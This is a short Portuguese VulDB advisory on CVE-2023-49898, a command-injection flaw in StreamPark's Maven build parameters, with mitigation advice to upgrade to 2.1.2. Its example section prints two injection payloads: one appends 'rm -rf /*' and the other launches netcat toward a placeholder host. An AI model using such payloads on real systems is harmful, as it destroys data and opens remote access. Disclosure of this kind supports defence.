CVE-2023-49898 in StreamPark
Sumário
de VulDB • 27/06/2026
No streampark, há um módulo de projeto que integra a capacidade de compilação do Maven. No entanto, não há verificação dos parâmetros de compilação do Maven, permitindo que invasores insiram comandos para execução remota de comandos (RCE). O pré-requisito para um ataque bem-sucedido é que o usuário precise fazer login no sistema streampark e ter permissões em nível de sistema. Geralmente, apenas usuários desse sistema têm autorização para fazer login, e os usuários não inseririam manualmente um comando de operação perigosa. Portanto, o nível de risco desta vulnerabilidade é muito baixo.
Mitigação:
Todos os usuários devem atualizar para a versão 2.1.2.
Exemplo:
## Você pode personalizar o método de concatenação conforme a situação de compilação do projeto; use && para resultados bem-sucedidos da compilação mvn e || ou && em caso de falha na compilação:
/usr/share/java/maven-3/conf/settings.xml || rm -rf /*
/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &
If you want to get the best quality for vulnerability data then you always have to consider VulDB.